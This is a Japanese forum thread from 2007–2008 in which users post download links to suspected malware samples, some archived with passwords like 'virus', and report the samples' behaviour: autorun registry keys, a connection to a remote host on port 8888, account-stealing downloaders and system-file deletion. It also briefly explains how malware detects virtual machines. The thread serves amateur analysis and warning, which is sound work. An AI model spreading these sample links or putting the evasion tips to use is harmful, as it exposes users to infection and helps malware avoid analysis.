739名無しさん@お腹いっぱい。:2007/06/11(月) 22:12:58
あげ保守
740名無しさん@お腹いっぱい。:2007/06/11(月) 22:14:44
インスコマンは今何処…
741名無しさん@お腹いっぱい。:2007/06/19(火) 22:20:05
あげとこ〜
742名無しさん@お腹いっぱい。:2007/06/19(火) 22:24:26
自分はZERO使っています。
ここのスレに書かれているアドレスを踏むのは無謀ですか?
743名無しさん@お腹いっぱい。:2007/06/20(水) 00:44:21
PHSかと思った。
744名無しさん@お腹いっぱい。:2007/06/20(水) 20:57:24
(^Д^)アゲ〜
745名無しさん@お腹いっぱい。:2007/06/27(水) 21:51:22
落とさないよ〜

(^Д^)アゲ〜
746名無しさん@お腹いっぱい。:2007/06/27(水) 22:25:12
最近インスコマン来てないの?
747インスコマン ◆0BgPFrwao2 :2007/06/29(金) 23:30:40
最近セキュ版自体見てなかった。
748名無しさん@お腹いっぱい。:2007/07/02(月) 12:54:22
つ[ ttp://vaxobjectsetup.com/download.php?id=4080 ]
749名無しさん@お腹いっぱい。:2007/07/08(日) 03:05:16
苺5 xs3133 おまけ.exe
750名無しさん@お腹いっぱい。:2007/07/08(日) 07:10:45
404ですた
751名無しさん@お腹いっぱい。:2007/07/08(日) 10:18:11
ttp://www.seagate.com/support/discwizard/DiscWizardSetup.jp.exe
752名無しさん@お腹いっぱい。:2007/07/08(日) 10:21:59
>>751
404ですた
753名無しさん@お腹いっぱい。:2007/07/08(日) 10:22:15
>>751
File Not Found (404)
754名無しさん@お腹いっぱい。:2007/07/08(日) 10:33:34
苺5 xs3136 おまけ.exe
755名無しさん@お腹いっぱい。:2007/07/08(日) 18:03:32
とりあえずエロマンガの方だけいただいて
あからさまにあやしいおまけ.exeはそのままごみ箱に捨てた
756名無しさん@お腹いっぱい。:2007/07/08(日) 19:16:09
>おまけ.exe

ワロタw
757名無しさん@お腹いっぱい。:2007/07/08(日) 19:35:24
抜き終わったのでいらないPCで実行した
素人なので細かい挙動とかわからないです

レジストリ追加
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"DoFOcyjN"="C:\\WINDOWS\\$NtUninstallKB918118$\\spuninst:DoFOcyjN.exe"

ファイル作成
C:\WINDOWS\$NtUninstallKB918118$\spuninst:DoFOcyjN.exe ?
C:\WINDOWS\$NtUninstallKB900485$\spuninst\xNrFtyhG.dll
作成されるファイル名ランダムかも

・DoFOcyjN.exe
プロセスに現れるもののエクスプローラから見えないのでいじれなかった。常駐有
・xNrFtyhG.dll
ttp://www.uploda.org/uporg894963.zip.html virus
Borland Delphi DLL おまけ.exe本体と大体同じ?

当環境では実行した瞬間からエクスプローラが重すぎて挙動不審なのでまともにPC操作できんとです
文字列見た印象では掲示板爆撃のように思えるけど、FWは特に何も言わなかった
ちゃんと動いているのか動いていないのか…
758名無しさん@お腹いっぱい。:2007/07/17(火) 23:24:04
http://raus.de/crashme/
よろ
759名無しさん@お腹いっぱい。:2007/07/18(水) 01:36:00
ブラクラかよ
760名無しさん@お腹いっぱい。:2007/07/19(木) 20:50:55
http://23153.gandefinkionladesun.com/pic_collection/

しばらく会話のなかったメッセの知り合いがいきなりこのアドだけ
伝えてきた…クリックしたらインストール警告画面。
知り合いはもうログアウトしちまったし…こえーよ;
761名無しさん@お腹いっぱい。:2007/07/19(木) 20:51:57
あ、インスト警告じゃなかった。
でもやっぱこえー;
762名無しさん@お腹いっぱい。:2007/07/19(木) 20:55:52
その知り合いがメッセンジャーのスパムで自己増殖するワームかなんかに感染しちゃってるんだろ。
教えてやれ。
763名無しさん@お腹いっぱい。:2007/07/19(木) 21:06:25
>>762
まじか…そんなスパムがあるとは知らなかった
しかし、ログインしてもメッセ到着しないんだよな、なぜか
それもスパムのせいなのかね
さてどうやって伝えるか…
764名無しさん@お腹いっぱい。:2007/07/19(木) 22:20:38
WarezovとかStrationとか呼ばれている奴だな
765名無しさん@お腹いっぱい。:2007/07/23(月) 20:41:11
age
766名無しさん@お腹いっぱい。:2007/07/23(月) 21:59:42
     ,ハ,,,ハ
    (,,・ω・)  キーコキコ
 〜  。(_ ゚T゚
.     ゚ ゚̄
767名無しさん@お腹いっぱい。:2007/07/24(火) 02:23:04
和んだ
768名無しさん@お腹いっぱい。:2007/07/24(火) 20:59:04
苺70 bh3744 keyもpassも  kamo

愚弟が愚友から提供(CDRで)を受けて何も考えずクリック。
ファイルは典型的な 「偽ファイル名.( 空 白 ).exe」型が4ヶ。
ただノートン、マカフィともに無反応でスルー。新種?それとも出来損ないファイル?
感染(?)機をネット遮断して起動させてみたもののさしあたり特別な挙動はないかんじだが。

説教で終わらすにしろ、再インスコさせるにしろ、挙動がわかれば嬉しいです。
769名無しさん@お腹いっぱい。:2007/07/24(火) 21:47:09
つ http://research.sunbelt-software.com/submit.aspx
770名無しさん@お腹いっぱい。:2007/07/25(水) 04:00:44
うpが無いんではどうしようも
771名無しさん@お腹いっぱい。:2007/07/25(水) 09:08:30
>>768
すべてのファイルを実行したんだとすると危険だったような
単一ファイルじゃなにもおきないタイプだったと思う
772名無しさん@お腹いっぱい。:2007/07/25(水) 13:22:16
>>768
readme.txt .exe だけ反応した。
ttp://www.virustotal.com/resultado.html?0b4d624178bb84b81be1a99a413f896b
773名無しさん@お腹いっぱい。:2007/07/27(金) 23:34:32
>>771>>772
ありがとう。1つクリックしただけみたいなので、説教の上
残存価額支払いまではPCリビング固定の刑に処することにするよ。
774名無しさん@お腹いっぱい。:2007/07/29(日) 16:31:25
あやしいファイル実行するのって一つの趣味?
775名無しさん@そうだ選挙に行こう:2007/07/29(日) 16:55:37
と研究だろ
776名無しさん@お腹いっぱい。:2007/07/31(火) 11:24:25
履歴書に書いてもおk
777名無しさん@お腹いっぱい。:2007/08/16(木) 04:23:58
貼っておきますね

563 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:2007/08/16(木) 04:18:49 ID:YvGrkCHp0
本当はこっちに書きたかったんですけど
アクセス規制されててかけないので
こちらに書かせて頂きますm(__)m

あやしいファイルを実行するスレ
http://pc11.2ch.net/test/read.cgi/sec/1140517079/

スレ違いで申し訳ないんですが
コイツがあやしいのです
ttp://a-draw.com/contents/uploader3/src/up0105.lzh.html

pass:deepp

mp3なんですけど、右クリックするとそのまま固まるんです
情報をポップアップしようとするとフォルダが閉じるし
単に壊れてるファイルなんでしょうか?
778名無しさん@お腹いっぱい。:2007/08/16(木) 05:46:09
>>777
特に問題ない。
mp3infopとか、右クリックで表示されるメニューの中のどれかのソフトが問題なんじゃない?
779名無しさん@お腹いっぱい。:2007/08/16(木) 06:24:29
>>777
ロダの仕様なのかブラウザ経由だと壊れた書庫の状態で落ちてきた
解凍前にファイルサイズが合ってるか確認すれ

中身は同じく問題無し
780名無しさん@お腹いっぱい。:2007/08/16(木) 20:45:40
http://www6.uploader.jp/dl/cjhs84/cjhs84_uljp00107.zip.html

実行お願いします
781名無しさん@お腹いっぱい。:2007/08/17(金) 01:43:50
チーターは巣に帰れ。
782名無しさん@お腹いっぱい。:2007/08/30(木) 13:14:53
http://11731.kit.carpediem.fr/BT-Bukkake.exe
783名無しさん@お腹いっぱい。:2007/08/30(木) 16:47:12
>782
アプリケーションの新規ファイル作成時にイベントが発生しました
C:\Program Files\Mozilla Firefox\firefox.exe.
ファイルは隔離されましたESET社へファイルを提出してください

ttp://www7.uploader.jp/dl/maru/maru_uljp00061.jpg.html
784名無しさん@お腹いっぱい。:2007/08/30(木) 17:01:11
ポルノウェア
not-a-virus:Porn-Dialer.Win32.CapreDeam.p
785名無しさん@お腹いっぱい。:2007/08/30(木) 17:09:22
鑑定スレじゃないんだから、実行しろよ。
インスコマーーーーン!!
786インスコマン ◆qlwUrCXXtM :2007/08/30(木) 22:51:11
>>783
なんかマカヒーが常駐してるみたいなんだけど
違うかな・・・
787インスコマン ◆qlwUrCXXtM :2007/08/30(木) 22:53:59
訂正
SiteAdvisorか
788名無しさん@お腹いっぱい。:2007/09/22(土) 16:27:43
このスレ埋めないか
789名無しさん@お腹いっぱい。:2007/09/23(日) 13:43:34
過疎スレ埋め
790名無しさん@お腹いっぱい。:2007/09/23(日) 13:44:54
過疎スレ埋め
791名無しさん@お腹いっぱい。:2007/09/23(日) 13:46:37
今度なんかもってきていいですか?
792名無しさん@お腹いっぱい。:2007/09/23(日) 18:55:38
だが断る
793名無しさん@お腹いっぱい。:2007/10/03(水) 03:19:39
無料常駐系のオススメって何かある?
前までPestPatrol2005入れてたんだけど、この度OS再インスコで消えてもーた
もう本家では配布してないし
どうしよう
794名無しさん@お腹いっぱい。:2007/10/03(水) 03:20:13
>>793
またお前か
795名無しさん@お腹いっぱい。:2007/10/03(水) 03:25:39
>>794
無料常駐系のオススメって何かある?
前までPestPatrol2005入れてたんだけど、この度OS再インスコで消えてもーた
もう本家では配布してないし
どうしよう
796名無しさん@お腹いっぱい。:2007/10/03(水) 03:34:14
>>795
無料常駐系のオススメって何かある?
前までPestPatrol2005入れてたんだけど、この度OS再インスコで消えてもーた
もう本家では配布してないし
どうしよう
797名無しさん@お腹いっぱい。:2007/10/03(水) 03:39:07
>>796
無料常駐系のオススメって何かある?
前までPestPatrol2005入れてたんだけど、この度OS再インスコで消えてもーた
もう本家では配布してないし
どうしよう
798名無しさん@お腹いっぱい。:2007/10/03(水) 23:14:28
そういや、NOD厨はPestPatrol信者も兼ねていたね。
799名無しさん@お腹いっぱい。:2007/10/05(金) 16:40:32
http://www.uploda.net/cgi/uploader1/index.php?file_id=0000257485.exe

実行してしまいました。
何が起こるか教えてください。
800名無しさん@お腹いっぱい。:2007/10/05(金) 22:49:27
実行したならわかるだろ?
801名無しさん@お腹いっぱい。:2007/10/13(土) 09:33:12
ワロタ
802名無しさん@お腹いっぱい。:2007/10/16(火) 14:51:44
埋め
803名無しさん@お腹いっぱい。:2007/10/17(水) 13:01:40
http://www11.axfc.net/uploader/20/so/He_40143.rar.html

変わりに実行してもらえませんか? pw sfdx
804名無しさん@お腹いっぱい。:2007/10/17(水) 14:43:57
Trojan.Win32.KillWin
\windows\system32\hal.dll を削除してシャットダウン実行。
805名無しさん@お腹いっぱい。:2007/10/17(水) 15:10:32
dr.webのリンクチェッカーでここに出てきたサイト
チェックしたけど全部CLEANとかなるんですけど?
これってDr.WEBが代わりにそのリンクにつないで
ウイルスがあるかないかチェックしてるんじゃないの?
806名無しさん@お腹いっぱい。:2007/10/17(水) 15:14:14
>>804 有難うございます!あぶなかった!
807名無しさん@お腹いっぱい。:2007/10/17(水) 18:03:28
>>803
>>781
808名無しさん@お腹いっぱい。:2007/10/20(土) 13:08:08
アンチウイルスソフト反応なし。
ttp://upload2.dyndns.org/up/4/_/jump/1191704740.zip/attatch
pass お借り致します


よろしくです〜
809名無しさん@お腹いっぱい。:2007/10/20(土) 17:22:29
>>808
ttp://www.virustotal.com/resultado.html?e2b091f83e3f7a6bf1e6fb788b727a9b
Result: 0/32 (0%)
810名無しさん@お腹いっぱい。:2007/10/21(日) 00:29:51
>>808
セキュ版は高校生と中学生しかいないから実行出来るような強者はいないよ
AA貼るくらいしか出来ないから
811名無しさん@お腹いっぱい。:2007/10/21(日) 06:57:40
スクラップしておかないとな
812808:2007/10/21(日) 14:54:24
そうなのかw
確かにろくな書き込みがないww
セキュリティ板使えねーwwww
813名無しさん@お腹いっぱい。:2007/10/21(日) 16:37:54
ビビって実行も出来ない人間に使っていただく板でもありませんし
814名無しさん@お腹いっぱい。:2007/10/21(日) 19:04:28
スペシャルフォースのチートばっかだしな。
815名無しさん@お腹いっぱい。:2007/10/21(日) 23:17:26
ログ読み終えた感想。
インスコマン素敵。抱かれたい。
816名無しさん@お腹いっぱい。:2007/10/22(月) 00:07:48
ここは鑑定スレじゃないってのに
817名無しさん@お腹いっぱい。:2007/10/22(月) 00:54:04
いいえ。鑑定スレです。
818名無しさん@お腹いっぱい。:2007/10/22(月) 17:56:01
鑑定しか出来ないやつしかいないから仕方ない。
Virtual PCとか使ってるやついないの?
ここ↓
http://www.microsoft.com/downloads/details.aspx?FamilyId=21EABB90-958F-4B64-B5F1-73D0A413C8EF&displaylang=en
でIE test用で無料公開されてるXPダウソしてVirtual PCで動かせば
誰でも仮想環境手に入るよ。Windowsの更新は出来んけど感染実験は
普通に出来るから問題ない
819名無しさん@お腹いっぱい。:2007/10/22(月) 17:58:43
情報少なすぎて踏む気がしない
820名無しさん@お腹いっぱい。:2007/10/22(月) 18:59:22
NTTのセキュリティー対策ソフトが2008になるのはいつごろ?
821名無しさん@お腹いっぱい。:2007/10/22(月) 19:47:40
プロバイダ板で聞けよ
822名無しさん@お腹いっぱい。:2007/10/22(月) 20:05:06
>>818
お前が導入して鑑定しろ。
VMware持ってるけど面倒くせえ。
とりわけ>>808に関しては実行する価値が皆無。
823名無しさん@お腹いっぱい。:2007/10/22(月) 20:35:03
PC余ってるけど使う気しないんだよな。まさかの時の為に金くれるって言うなら実行してやってもいいけど。
それよりもまだアングラ(死語)気取りの厨房がいるって事自体に驚きだww
824名無しさん@お腹いっぱい。:2007/10/22(月) 22:21:38
どうすればここ盛り上がるんだ?
825名無しさん@お腹いっぱい。:2007/10/22(月) 22:23:28
別に盛り上げる必要とかないから
826青春たろう:2007/10/22(月) 22:32:01
なんでだよ・・・
思い出とかつくりてぇじゃねぇかよ!!
お前らこれでいいのかよっ!
827名無しさん@お腹いっぱい。:2007/10/22(月) 23:21:19
だってもう夏は終わったし
828名無しさん@お腹いっぱい。:2007/10/22(月) 23:26:01
>>825
お前文化祭行かないタイプだな
829名無しさん@お腹いっぱい。:2007/10/25(木) 05:08:19
ttp://www3.uploader.jp/dl/akaiup/akaiup_uljp01343.zip.html
うpろだで見つけて興味本位でダブルクリックしてみたんですが、何もおきませんでした。
ノートンやVirusTotalでも反応無しです。
ただ、起動したときに一瞬だけコマンドプロンプトが起動したようなしなかったような。
結局何かわからずじまいなので、どういったものかわかる方がいればお願いします。
830名無しさん@お腹いっぱい。:2007/10/25(木) 05:35:59
↑PASSWDくらい書けこのカスw
831名無しさん@お腹いっぱい。:2007/10/25(木) 11:13:22
すみません、パスはfurutinです。
832名無しさん@お腹いっぱい。:2007/10/25(木) 22:51:05
デカ過ぎて解析する気にならん。
833名無しさん@お腹いっぱい。:2007/10/26(金) 00:05:22
残念。
今のとこPCに問題は出てないんですよね・・・。なんなんだろ
834名無しさん@お腹いっぱい。:2007/10/26(金) 15:28:07
C:\Windows\winhttp.dllにアクセスして何かするみたいだけど
俺のパソコンにwinhttp.dllが存在しないので、そのまま何もしないで終了したっぽい
835名無しさん@お腹いっぱい。:2007/10/27(土) 02:59:06
>>834
ありがとう。
PC内の個人情報送るとかそういう類のモノかもしれないですね
836名無しさん@お腹いっぱい。:2007/12/06(木) 10:46:52
ttp://cowscorpion.com/dl/x264.html
これの一番上をおねがいします。
837名無しさん@お腹いっぱい。:2007/12/08(土) 15:04:17
>>836
ただのコーデックじゃん
838名無しさん@お腹いっぱい。:2007/12/11(火) 02:45:31
ttp://2up.pgrup.net/uploader/download/1197306644.zip
お願いします
839名無しさん@お腹いっぱい。:2007/12/11(火) 04:12:53
>>838
ttp://www.virustotal.com/jp/resultado.html?2c4553a9d5f04ba3892a7f56cacb8dc8
840名無しさん@お腹いっぱい。:2007/12/11(火) 18:08:07
>>839
すいません。
ファイルを受理中となるだけでよく分かりません。
どういうことなんでしょうか?
841名無しさん@お腹いっぱい。:2007/12/16(日) 02:39:20
ttp://zenyrskin.innori.com/attachment/gk3.zip
なんでしょうコレ
842名無しさん@お腹いっぱい。:2007/12/20(木) 18:45:55
何このスレ
ウィルス集めに最適じゃんお前らお疲れ様です
843名無しさん@お腹いっぱい。:2007/12/31(月) 18:15:30
http://ktkr.vip2ch.com/upload.cgi?mode=dl&file=16595

鑑定お願いします
ファイル名:svchot.exe
圧縮してあります
容量 11.6MB
発見場所
C:\WINDOWS\SYSTEM32\MICROSOFT

とっても不安ですorz
844名無しさん@お腹いっぱい。:2008/01/02(水) 03:01:34
ダウソできねえよ?
845名無しさん@お腹いっぱい。:2008/01/02(水) 03:09:15
というかなんで、そんなファイルダウソしようとしたの?
「発見場所」って、winユーザーでそのファイルが無い人は
多分居ないよ。
846名無しさん@お腹いっぱい。:2008/01/02(水) 18:26:41
正規のsvchost.exeはその1つ上のディレクトリにあるもののはずだが
つまりsvchost.exeを偽装したウィルスの可能性は十分ある
847名無しさん@お腹いっぱい。:2008/01/30(水) 01:15:16
ttp://tweak-ui-powertoy.jp.brothersoft.com/download/
ここからDownloadできるTweak UI のインチキくさいセットアップファイル
848名無しさん@お腹いっぱい。:2008/01/30(水) 17:31:28
>>847
変なサイトを経由してはいるが、最終的に手に入るバイナリは
マイクロソフトのサイトにおいてあるしデジタル署名もついている
849名無しさん@お腹いっぱい。:2008/02/24(日) 17:29:19
ホッシュ
850名無しさん@お腹いっぱい。:2008/03/03(月) 08:41:23
http://www.uploader.jp/dl/oklsslv2ym/oklsslv2ym_uljp00068.zip.html

パスabcde

pornoplayersetupexe

海外の闇のアダルト業界が総力を結集して開発した
ポルノメディアプレイヤー
アンチウイルスソフトではスパイウエアとして検知される

参考URL
http://www.shareedge.com/spywareguide/product_show.php?id=3582
851名無しさん@お腹いっぱい。:2008/03/03(月) 13:17:18
>>850
http://www.virustotal.com/analisis/baa35c4fbd394b9e1f377ed395851cb0
852v2y:2008/03/03(月) 16:38:33
これ、最後に出てくるMP3ってFlashか

…exe全然関係ナスwww



ところでポルノどこ?(バーボン風
853名無しさん@お腹いっぱい。:2008/03/11(火) 04:40:37
http://enjoi.blogdns.net/up/src/2302.lzh
854v2y:2008/03/12(水) 03:03:17
たぶん、どっかから拾ってきたフラゲをexeにして、
アドウェア2個と抱き合わせにしたやつぽい
フラだけ抽出して圧縮したら、330KBになった

アドウェアは明日からのんびり覗いてみる
855名無しさん@お腹いっぱい。:2008/03/13(木) 14:38:09
ttp://www5.uploader.jp/dl/tane/tane_uljp00311.zip.html
パス:virus
856名無しさん@お腹いっぱい。:2008/03/14(金) 11:26:36
検出可否スレも見てる

休憩時間に、とりあえず0だけ踏んでみた
手抜きしてるんもあるんだが、うまく感染させられなかった
無理矢理実行してみたが、なんかアンケート画面(日本語英語じゃない)みたいのの
URLを見に行こうとして、それ以上進めない
857名無しさん@お腹いっぱい。:2008/03/14(金) 16:56:28
821 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/03/13(木) 16:37:27

ttp://www5.uploader.jp/dl/tane/tane_uljp00309.zip.html
Malware-Pack27

感染が怖いなら右クリ(ry
858名無しさん@お腹いっぱい。:2008/03/14(金) 16:57:01
887 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/03/14(金) 16:07:23
お題
ttp://www.lineagecojp.com/movie/mov0028.zip

パスはないのでダウンロード後の扱いに注意してね
859名無しさん@お腹いっぱい。:2008/03/14(金) 18:23:19
http://updas.net/up/download/1205455546.zip
p:vip

次はこれかw
860名無しさん@お腹いっぱい。:2008/03/15(土) 00:30:09
http://updas.net/up/download/1205455546.zip
p:vip

次はこれかw
861名無しさん@お腹いっぱい。:2008/03/15(土) 00:39:30
913 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/03/15(土) 00:17:44
お題!?
http://www5.uploader.jp/dl/tane/tane_uljp00312.zip.html
pass:virus
862名無しさん@お腹いっぱい。:2008/03/15(土) 14:20:06
922 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/03/15(土) 11:46:28
問題のトレンドマイクロのHPに埋め込まれたウイルスです

http://www5.uploader.jp/dl/tane/tane_uljp00310.rar.html

パス:TM

日本時間:15日8時頃
JS_IFRAME.JZ
http://www.virustotal.com/jp/analisis/804298425d6ccfb4383f1af93a7c6634
JS_DLOADER.TZE
http://www.virustotal.com/jp/analisis/933edad4836834738edd51b8561fb542

863名無しさん@お腹いっぱい。:2008/03/15(土) 21:19:05
926 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/03/15(土) 21:03:40
お題
http://www5.uploader.jp/dl/tane/tane_uljp00313.zip.html
p:messenger

現時点ではカスペやAVGですら検知できてません。
864名無しさん@お腹いっぱい。:2008/03/16(日) 12:54:16
940 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/03/16(日) 12:19:06
ttp://www5.uploader.jp/dl/tane/tane_uljp00314.zip.html
virus

次はこれかw
865名無しさん@お腹いっぱい。:2008/03/16(日) 21:12:45
956 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/03/16(日) 19:59:45
>>949の修正版
ttp://www5.uploader.jp/dl/tane/tane_uljp00317.zip.html
virus
866名無しさん@お腹いっぱい。:2008/03/16(日) 23:05:30
なんで
【ソースネクスト/K7】ウイルスセキュリティZERO pert18
http://pc11.2ch.net/test/read.cgi/sec/1201032031/
からコピペしてんの?
867名無しさん@お腹いっぱい。:2008/03/17(月) 16:11:28
休み時間に、またちょっとつついてみた

>>862
現在は: ダウソ先がつながんない
てかこれ、itmediaで見たときには、すでにつながんなかったんだな

>>863
難読化が少なくとも3層かかってる
サービスぽい名前のコピーを作って、自分は終了する
コピーが*.cybernix.info:8888につなごうとしてた
これはテーブルに書いてあるようで、容易に変更できるようにしているのかと
ちょっとパケット覗けないPC状況だったので、そっからは覗けてない

メッセがCreateInstance()で操作できるってのは、やっぱり罪なことなのかなと

いずれも有害ははっきりしてるものだしってことで、
のんびり、踏んでみたのは うんちく程度にレポする
868名無しさん@お腹いっぱい。:2008/03/18(火) 14:15:45
115 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/03/18(火) 13:55:29
ちょい古いけどまとめたもの。
http://www.dotup.org/uploda/www.dotup.org5768.zip.html
pass:virus
988 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/03/18(火) 14:00:27
ちょい古いけどまとめたもの。
http://www.dotup.org/uploda/www.dotup.org5768.zip.html
pass:virus
869名無しさん@お腹いっぱい。:2008/03/19(水) 12:18:56
11 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/03/19(水) 10:45:10
virus
http://www5.uploader.jp/dl/tane/tane_uljp00319.zip.html

次はこれかw
870名無しさん@お腹いっぱい。:2008/03/20(木) 00:37:59
>>869 Flashのほう

IEで ttp://br.youtube.com/watch?v=FGoGb1aYpbc を開いている間に、
偽IE, 偽ノートン(名前だけ。Delphiのアイコンのままだ), 偽メッセが落ちてくる
それぞれ、どっかの銀行の垢抜き、orkutの垢抜き、自分(偽flash9)の流布をしてるんだろう
だろう、っていうのは、中覗いててきとーに予想したことなので なにしろ英語でもないし
これらはtinyurlを経由して指定されていて、平文のexeだ
871名無しさん@お腹いっぱい。:2008/03/20(木) 01:04:01
>>869 もういっこのほう

なんか処理してるっぽい画面が出た後、
IEで ttp://www.receita.fazenda.gov.br/Aplicacoes/ATCTA/cpf/ConsultaPublica.aspを表示
ぼーっとしてるまに、exeが2個落ちてくる
httpで手短に送信したあと、こんどはどっかにftpでつなごうとするところまで見た
872名無しさん@お腹いっぱい。:2008/03/24(月) 09:15:02
インスコマン……(;´д⊂ヽ
873名無しさん@お腹いっぱい。:2008/03/24(月) 09:44:32
スレ維持しておけば、帰ってきはるかと
874名無しさん@お腹いっぱい。:2008/03/26(水) 20:21:39
あげ
875インスコマン ◆qlwUrCXXtM :2008/03/27(木) 10:22:28
>>873
まだ覚えてくれている人がいたんですね

>>873
コテ使わないでセキュ板見てます

>>870-871
乙。
876名無しさん@お腹いっぱい。:2008/03/27(木) 10:33:11
キター
877名無しさん@お腹いっぱい。:2008/04/08(火) 04:24:51
noop
878名無しさん@お腹いっぱい。:2008/04/09(水) 00:10:18
bochs
879名無しさん@お腹いっぱい。:2008/04/11(金) 09:02:46
http://www5.uploader.jp/dl/tane/tane_uljp00030.exe.html
pass12345

バーチャルガール?
880名無しさん@お腹いっぱい。:2008/04/11(金) 18:20:56
yourfilehostなんかの広告にでてくるvirtualgirlってやつだと思います
いま最新版落としてきたら、完全一致しました

インスコしたことがあります そのときは、微エロ系デスクトップマスコットでした
初期データセット(無料分)、本体、関係DLLなど、とにかく大量にダウソしてくるです
無料のマスコットセットがいくつか付いてきて、そろえるには購入が必要という手合いです
メアド登録して垢をとらされます
そこに、追加購入したセット、期間限定で取得したセットが紐づけられます

ありがちな、別添アドウェア、別添トロイはなかったぽかったですが、
bbspinkに慣れた人なら、とびついて使うようなもんでもないかも
881名無しさん@お腹いっぱい。:2008/04/18(金) 06:52:13
ttp://uproda.2ch-library.com/src/lib021724.zip

解凍後のexeアプリケーションを実行しましたが問題ないでしょうか。
鑑定をお願いします
882名無しさん@お腹いっぱい。:2008/04/18(金) 11:58:21
いまどきexeちょっと踏んだくらいでは、安全の保証ってできかねますけどね
明らかに有害か、ちょっと踏んでみた限りでは脅威がなさげか、所詮そのどっちかです

>>881
クラックツールです 「これってなんですか?」に準じて対応。

MGADiag.exe
MS純正のWGA診断ツールのようです 一応署名されています v1.5系。最新ではありません
実行するとネットにアクセスします 通常どおりWGAを試みているのでしょう

keyfinder.exe
www.magicaljellybean.comで配っているkeyfinderです 最新ではありません
公式に配布している旧バージョンと一致しました 自己解凍書庫だったりするのは仕様です
レジストリに記録されているキーを収集してくれるみたいです
キーの書き換え機能もあります 書庫の中の.vbsファイルを覗けばわかりますが、案外素直。

wga-fix.exe
hostsファイルを操作して、WGAへの通報を抑制しようとしているのでしょう
意図はわからんではないのですが、効果が今でもあるのかは存じかねます
安全鑑定はいたしかねます コピを是認する方に委ねます

Windows XP Keygen.exe
よくわからない計算をして、キーらしきものを吐きます
安全鑑定はいたしかねます コピを是認する方に委ねます
883881:2008/04/18(金) 12:05:42
ありがとうございます。

“コピを是認する方”はここにはいないということでしょうか
884名無しさん@お腹いっぱい。:2008/04/18(金) 12:47:23
割れ厨はダウソ板にでも行ってください
885名無しさん@お腹いっぱい。:2008/04/18(金) 13:06:33
あやしいファイルには違いないわな
886881:2008/04/18(金) 22:36:49
コピ の意味が判らずに書き込んでしまいました。
あと 割れ厨 の意味も判りません。
ご教示ください。
887名無しさん@お腹いっぱい。:2008/04/18(金) 22:38:44
首つって氏ね
888名無しさん@お腹いっぱい。:2008/04/18(金) 23:07:42
淡々とマジレス

コピ: 違法コピー。
割れ厨: この場合、先方の主義に関わらず自らの違法コピーを推進しようとする人々。

2ちゃんねるにはいろんな人がおり、コピに対する姿勢は様々ですが
コピを暗黙であれ、容認するスレ以外では、あんまりコピの話はしないほうがいいわけです

そのファイルを積極的に踏んだのであればいうまでもなく、だまされて踏まされたとしても、
そのファイルをOKと鑑定しても、NGと鑑定しても、割れ厨さんに寄与してしまいますので、
コピに容認な人も否認な人もまじってるこの板では、なんともいうてさしあげられかねます

あと888げと
889881:2008/04/19(土) 00:35:17
ありがとうございました
890名無しさん@お腹いっぱい。:2008/04/20(日) 00:56:12
このスレの住人って当然、仮想マシン(VmWare VirtualPC)から
ファイル実行してんだよね。じゃなきゃ怖くてそんなことできない。
891名無しさん@お腹いっぱい。:2008/04/20(日) 02:08:00
むしろ普通にVPC/VMWare上で実行は×
仮想マシンよけが実装されてることが増えてる
892名無しさん@お腹いっぱい。:2008/04/20(日) 02:33:35
>>891
仮想マシンよけ?
一体、どういう原理で仮想マシンか否か識別してるわけ?
893名無しさん@お腹いっぱい。:2008/04/20(日) 02:44:28
VMWareにせよ、VPCにせよ、高速化する専用ドライバとかいれるでしょ
ああいうのを検出すればいい これはカンタン
あと、(仮想マシン上に)rootkitが入ったときに、CPUの使用方法が通常モードと違うから、
これを検出したら、悪意ある行動をやめるか、遅らせるとかするといい
894京北高等学校の植野公友:2008/04/21(月) 20:47:41
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????
?????????????????????????????????????????????????????
895名無しさん@お腹いっぱい。:2008/06/14(土) 15:19:45
http://www1.axfc.net/uploader/He/so/109598.exe

これをじっこうするとハルヒというのがでました。ウイルスですか?NOD32では検出されません。
896名無しさん@お腹いっぱい。:2008/06/14(土) 15:21:50
キーワードは 1 です

897名無しさん@お腹いっぱい。:2008/06/14(土) 22:45:57
レジストリを書き換えて、毎度実行するようにはなるみたいです
タスクマネージャの起動の抑制もかかります あと音がでます
無害でも無益です 踏まない方がいいでしょう
898名無しさん@お腹いっぱい。:2008/06/20(金) 23:04:02
>>895
AVGで検出したもの
http://www.virustotal.com/analisis/bffcc77feb19478b7c90f66a77847c5d
http://www.virustotal.com/analisis/f4a6e7e6c9e3bfc852821ecb30a37f80
899名無しさん@お腹いっぱい。:2008/06/20(金) 23:06:47
ま、カスペとAVGがウイルスといってる以上ウイルスなんじゃね?
900名無しさん@お腹いっぱい。:2008/07/04(金) 23:17:23
 
901名無しさん@お腹いっぱい。:2008/07/04(金) 23:19:04
 
902インスコマン ◆qlwUrCXXtM :2008/07/31(木) 14:53:41
1.http://www5.uploader.jp/user/tane/images/tane_uljp00056.png
2.http://www5.uploader.jp/user/tane/images/tane_uljp00055.png

3.http://www5.uploader.jp/user/tane/images/tane_uljp00054.png
過疎ってるからage

MBAMお勧め!(上のマルウェアも大方これで削除可能!ComboFixもお勧め!)
ttp://www.bleepingcomputer.com/malware-removal/uninstall-antivirus-2009
903インスコマン ◆qlwUrCXXtM :2008/07/31(木) 14:58:06
>>902の画像のさいとのURLのっけときます
195.225.176.63/in.php?id=16&se=1&keyword=Polliciy22.info&host=gremmioti.cn&dkw=
